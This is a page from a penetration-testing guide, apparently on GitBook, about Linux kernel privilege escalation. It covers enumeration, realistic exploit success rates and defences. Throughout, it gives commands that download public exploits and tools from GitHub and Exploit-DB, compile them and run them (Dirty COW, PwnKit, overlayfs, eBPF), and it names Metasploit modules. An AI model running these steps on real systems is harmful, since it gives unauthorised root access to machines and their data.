This guide is currently under development, and I greatly welcome any suggestions or feedback or at reaper.gitbook@gmail.com

Kernel exploits and dirty techniques

Understanding Kernel Exploits

What Makes Kernel Exploits Dangerous

Kernel exploits target vulnerabilities in the operating system kernel to gain the highest level of system privileges. Unlike userspace exploits that operate within application boundaries, kernel exploits directly compromise the core of the operating system, providing complete system control and the ability to bypass all security mechanisms.

The Attack Principle: Exploit scenarios where:

  • Kernel vulnerabilities allow privilege escalation from user to root

  • Memory corruption bugs in kernel code can be leveraged for code execution

  • Race conditions in kernel operations create exploitable timing windows

  • System call interfaces have implementation flaws

  • Kernel modules or drivers contain security vulnerabilities

Why This Works: The kernel operates with the highest privileges and has direct access to all system resources. Successful kernel exploitation provides complete system compromise, including the ability to modify security policies, access all data, and persist with maximum stealth.

Kernel Vulnerability Discovery and Enumeration

System Information Gathering

Kernel Version Analysis:

# Get detailed kernel information
uname -a
cat /proc/version
cat /etc/os-release
lsb_release -a

# Check kernel configuration if available
cat /proc/config.gz | gunzip | grep -E "(SMEP|SMAP|KASLR|KPTI)"
zcat /proc/config.gz | grep -E "(DEBUG|LOCKDEP|KASAN)"

# Check security mitigations
cat /proc/cmdline
dmesg | grep -E "(SMEP|SMAP|KASLR|KPTI|NX)"

Module and Driver Enumeration:

# List loaded kernel modules
lsmod
cat /proc/modules

# Check module information
modinfo module_name
find /lib/modules/$(uname -r) -name "*.ko" | head -10

# Look for custom or third-party modules
lsmod | grep -v "^Module" | awk '{print $1}' | while read mod; do
    modinfo "$mod" 2>/dev/null | grep -E "(author|description)"
done

System Call and Interface Analysis:

# Check available system calls
cat /proc/kallsyms | grep " sys_" | head -20

# Look for unusual or debugging interfaces
ls -la /proc/sys/kernel/
ls -la /sys/kernel/debug/ 2>/dev/null

# Check for dangerous sysctl settings
sysctl -a | grep -E "(kptr_restrict|dmesg_restrict|randomize_va_space)"

Known Kernel Exploit Techniques

Linux Exploit Suggester

Using linux-exploit-suggester:

# Download and run linux-exploit-suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

# Alternative: linux-exploit-suggester2
wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
perl linux-exploit-suggester-2.pl

Using LinEnum for kernel information:

# Download and run LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh -k

Searchsploit for Kernel Exploits

Finding Kernel Exploits:

# Search for kernel exploits by version
searchsploit linux kernel $(uname -r | cut -d'-' -f1)
searchsploit linux kernel $(uname -r)

# Search for specific vulnerabilities
searchsploit dirty cow
searchsploit ptrace
searchsploit overlayfs

# Download exploit
searchsploit -m linux/local/exploit_id

Kernel Exploit Reality and Applicability

Why Kernel Exploits Often Fail in Practice

Modern Security Mitigations:

# Check for modern kernel protections
dmesg | grep -E "(SMEP|SMAP|KASLR|KPTI)"
cat /proc/cmdline | grep -E "(smep|smap|kaslr|pti)"

# These protections break most kernel exploits:
# - KASLR: Randomizes kernel addresses, breaks exploit reliability
# - SMEP: Prevents execution of userspace code in kernel context  
# - SMAP: Blocks kernel access to userspace data
# - KPTI: Mitigates Meltdown-class timing attacks

Distribution Patch Reality:

# What version shows vs actual security level
uname -r
# Shows: 4.15.0-144-generic (appears old and vulnerable)

# But check actual patch status
apt list --installed | grep linux-image
cat /proc/version
# Ubuntu backports security fixes without changing version numbers
# A "4.15" kernel may have patches from 5.x kernels

Container Environment Limitations:

# Check container restrictions
capsh --print
cat /proc/self/status | grep Cap

# Most containers drop dangerous capabilities:
# - CAP_SYS_MODULE: Can't load kernel modules
# - CAP_SYS_RAWIO: Can't access raw devices
# - Seccomp filters block many syscalls needed for kernel exploitation

Realistic Kernel Exploit Success Scenarios

Where Kernel Exploits Actually Work:

  1. Embedded Systems and IoT Devices

    • Often run ancient, unpatched kernels

    • Limited or no security mitigations

    • Custom builds without modern protections

  2. Development and Test Systems

    • May have debugging features enabled

    • Often behind on patches

    • Less security hardening

  3. Legacy Enterprise Systems

    • Old RHEL/CentOS installations

    • Systems that can't be patched due to uptime requirements

    • Custom applications requiring specific kernel versions

  4. Systems with Custom Kernel Modules

    • Third-party drivers often have vulnerabilities

    • Custom hardware drivers

    • Proprietary kernel modules

Compilation and Environment Issues

Why Exploits Don't Compile:

# Check for development tools
gcc --version
which make
ls /usr/include/linux/

# Common missing requirements:
# - Kernel headers not installed
# - Wrong GCC version for exploit code
# - Missing development libraries
# - Architecture mismatch (ARM vs x86)

System Architecture Considerations:

# Check system architecture
uname -m
cat /proc/cpuinfo | grep "model name"
lscpu

# Many exploits are architecture-specific:
# - x86_64 exploits won't work on ARM
# - 32-bit vs 64-bit differences
# - Different CPU instruction sets

Specific Kernel Exploits

Dirty COW (CVE-2016-5195) - Real-World Applicability

When Dirty COW Actually Works:

# Check kernel version
uname -r
# Vulnerable: Linux kernel < 4.8.3, 4.7.9, 4.4.26

# Download Dirty COW exploit
searchsploit -m linux/local/40847
gcc -pthread 40847.c -o dirtycow

# Reality:
# - Container environments often block the attack
# - Modern systems have additional protections
# - Requires specific memory conditions to work reliably

Dirty COW Variants and Success Rates:

# /etc/passwd modification version (higher success rate)
searchsploit -m linux/local/40839
gcc -pthread 40839.c -o passwd_cow

# PTRACE version (often fails on hardened systems)
searchsploit -m linux/local/40838
gcc -pthread 40838.c -o ptrace_cow

# Best success on: Ubuntu 14.04/16.04, CentOS 6/7 without latest patches

Overlayfs Exploits - Distribution Specific Issues

CVE-2015-1328 Reality:

# Check for overlayfs vulnerability
searchsploit overlayfs
searchsploit -m linux/local/37292
gcc 37292.c -o overlayfs

# Why it often fails:
# - Ubuntu disabled overlayfs in many kernel builds
# - Requires specific filesystem mount options
# - SELinux blocks exploitation on RHEL/CentOS
# - Only works on systems with overlayfs actually enabled

Overlayfs Success Prerequisites:

# Check if overlayfs is actually available
cat /proc/filesystems | grep overlay
modprobe overlay 2>/dev/null && echo "Overlay available"

# Check mount restrictions
mount | grep overlay
# Exploit only works if overlayfs mounts are possible

eBPF Exploits (CVE-2017-16995) - Modern Limitations

eBPF Exploitation Reality:

# Search for eBPF exploits
searchsploit ebpf
searchsploit -m linux/local/45010
gcc 45010.c -o ebpf_exploit

# Check if eBPF is actually exploitable
sysctl kernel.unprivileged_bpf_disabled
# If = 1, unprivileged eBPF is disabled (exploit fails)

# Success rate: <20% on modern systems because:
# - Most distributions disable unprivileged eBPF
# - JIT hardening prevents reliable exploitation
# - Complex heap grooming requirements often fail

PwnKit (CVE-2021-4034) - High Success Rate Exception

Polkit pkexec Exploitation:

# Check for PwnKit vulnerability
which pkexec
ls -la /usr/bin/pkexec

# Download exploit
wget https://github.com/berdav/CVE-2021-4034/raw/main/cve-2021-4034.c
gcc cve-2021-4034.c -o pwnkit
./pwnkit

# High success rate (~80%) because:
# - Recent vulnerability, many systems still unpatched
# - Works across different distributions
# - Doesn't require special kernel features
# - Reliable exploitation technique

Kernel Module Exploitation

Kernel Module Information

Module Analysis:

# Check loaded modules
lsmod | sort

# Get detailed module information
for mod in $(lsmod | tail -n +2 | cut -d' ' -f1); do
    echo "=== $mod ==="
    modinfo $mod
    echo
done | less

# Find module files
find /lib/modules/$(uname -r) -name "*.ko" -exec ls -la {} \;

Checking Module Loading Restrictions:

# Check if module loading is restricted
cat /proc/sys/kernel/modules_disabled
sysctl kernel.modules_disabled

# Check for Secure Boot
mokutil --sb-state 2>/dev/null
dmesg | grep -i "secure boot"

# Check module signing
cat /proc/sys/kernel/module_sig_only
modprobe --show-depends dummy 2>&1 | grep -i sign

Memory and Protection Analysis

ASLR and Memory Protections

Address Space Layout Randomization:

# Check ASLR status
cat /proc/sys/kernel/randomize_va_space
sysctl kernel.randomize_va_space

# Check memory layout
cat /proc/self/maps
cat /proc/1/maps | head -10

Security Feature Detection:

# Check for various security features
dmesg | grep -i "smep\|smap\|kaslr\|kpti"
grep -E "(smep|smap)" /proc/cpuinfo

# Check kernel hardening
checksec --kernel 2>/dev/null

Exploiting Specific Vulnerabilities

Using Existing Exploit Databases

Exploit-DB Integration:

# Update searchsploit database
searchsploit -u

# Search for recent kernel exploits
searchsploit linux kernel 2019
searchsploit linux kernel 2020
searchsploit linux kernel 2021

# Look for local privilege escalation
searchsploit linux local | grep -i "privilege escalation"

GitHub Exploit Repositories:

# Common exploit repositories to check:
# https://github.com/SecWiki/linux-kernel-exploits
# https://github.com/lucyoa/kernel-exploits
# https://github.com/xairy/kernel-exploits

# Example: Download from SecWiki
wget https://github.com/SecWiki/linux-kernel-exploits/archive/master.zip
unzip master.zip
cd linux-kernel-exploits-master

CVE Specific Exploits

CVE-2016-5195 (Dirty COW)

Dirty COW Variants:

# Original Dirty COW
searchsploit -m linux/local/40847
gcc -pthread 40847.c -o cow

# PTRACE Dirty COW
searchsploit -m linux/local/40838
gcc -pthread 40838.c -o ptrace_cow

# /etc/passwd modification version
searchsploit -m linux/local/40839
gcc -pthread 40839.c -o passwd_cow

CVE-2017-1000112 (UFO)

UFO Kernel Exploit:

searchsploit ufo
searchsploit -m linux/local/43418
gcc 43418.c -o ufo
./ufo

CVE-2018-18955 (Subuid/Subgid)

User Namespace Privilege Escalation:

searchsploit subuid
searchsploit -m linux/local/45886
gcc 45886.c -o subuid_exploit
./subuid_exploit

Advanced Kernel Analysis Tools

Kernel Security Analyzers

Using checksec for kernel:

# Install checksec
wget https://github.com/slimm609/checksec.sh/raw/master/checksec
chmod +x checksec

# Check kernel security features
./checksec --kernel

Kernel Guard Analysis:

# Check for kernel guard mechanisms
dmesg | grep -i "guard"
cat /proc/config.gz | gunzip | grep GUARD 2>/dev/null

# Stack canary information
dmesg | grep -i "stack"
cat /proc/config.gz | gunzip | grep STACK 2>/dev/null

Kernel Debugging Information

Debug Interface Analysis:

# Check debug interfaces (requires root)
ls -la /sys/kernel/debug/
mount | grep debugfs

# Kernel symbols
head -20 /proc/kallsyms
wc -l /proc/kallsyms

# Check symbol restrictions
cat /proc/sys/kernel/kptr_restrict

Automated Exploitation Frameworks

Using Metasploit for Kernel Exploits

Metasploit Kernel Modules:

# Start Metasploit
msfconsole

# Search for kernel exploits
search type:exploit platform:linux kernel

# Use specific exploits
use exploit/linux/local/overlayfs_priv_esc
use exploit/linux/local/dirty_cow
use exploit/linux/local/ptrace_traceme_priv_esc

Automated Privilege Escalation

Using BeRoot:

# Download BeRoot
wget https://github.com/AlessandroZ/BeRoot/raw/master/Linux/beroot.py
python beroot.py

Using SUID3NUM:

# Download SUID3NUM
wget https://github.com/Anon-Exploiter/SUID3NUM/raw/master/suid3num.py
python suid3num.py

Key Operational Considerations

Realistic Success Expectations

Modern System Exploitation Reality:

  • Enterprise systems: <5% success rate for kernel exploits

  • Cloud instances: <2% success rate due to updated kernels and containers

  • Embedded/IoT devices: 40-60% success rate on older firmware

  • Development systems: 15-25% success rate due to relaxed security

Factors That Determine Success:

# System age and patch level
cat /etc/os-release
last reboot | head -5

# Security feature status
cat /proc/cmdline
dmesg | grep -i "protection\|mitigation"

# Container/virtualization detection
systemd-detect-virt
cat /proc/1/cgroup | head -5

When to Focus on Kernel Exploits

High-Value Targets for Kernel Exploitation:

  1. Legacy systems that cannot be patched

  2. Embedded devices with custom firmware

  3. Systems with custom kernel modules or drivers

  4. Air-gapped networks with outdated security

  5. Development environments with debugging enabled

When to Skip Kernel Exploitation:

  1. Modern cloud instances (AWS, Azure, GCP)

  2. Recent Ubuntu/RHEL/CentOS installations

  3. Container environments without privileged access

  4. Systems with active patch management

  5. Hardened security distributions

Alternative Approaches When Kernel Exploits Fail

Focus Areas for Modern Systems:

  1. Application vulnerabilities - Web apps, databases, services

  2. Configuration issues - Weak passwords, misconfigurations

  3. Container escapes - When kernel access is limited

  4. Privilege escalation - SUID binaries, sudo misconfigurations

  5. Credential harvesting - Memory dumps, configuration files

Realistic Penetration Testing Strategy:

  • Use kernel exploit tools for enumeration and discovery

  • Don't rely on kernel exploits as primary attack vector

  • Test 2-3 most promising exploits maximum

  • Expect failure and have backup privilege escalation methods

  • Focus on information gathering rather than exploitation

Success Indicators vs Reality

What Indicates Actual Vulnerability:

  • Confirmed old kernel with no recent security updates

  • Missing critical packages (no automatic updates)

  • Custom or third-party kernel modules loaded

  • Disabled security features in kernel command line

  • Embedded system with known vulnerable firmware

What Usually Means Exploitation Will Fail:

  • Cloud provider instances (usually auto-patched)

  • Container environments (limited kernel access)

  • Recent OS installations (modern protections enabled)

  • Enterprise managed systems (regular patching)

  • Security-focused distributions (additional hardening)

Kernel exploitation has become significantly more difficult and unreliable on modern systems. Success requires careful target selection, realistic expectations, and thorough pre-exploitation assessment rather than blindly running exploit tools.

PreviousFile system race conditionsNextAutomated Enumeration Tools

Last updated

Was this helpful?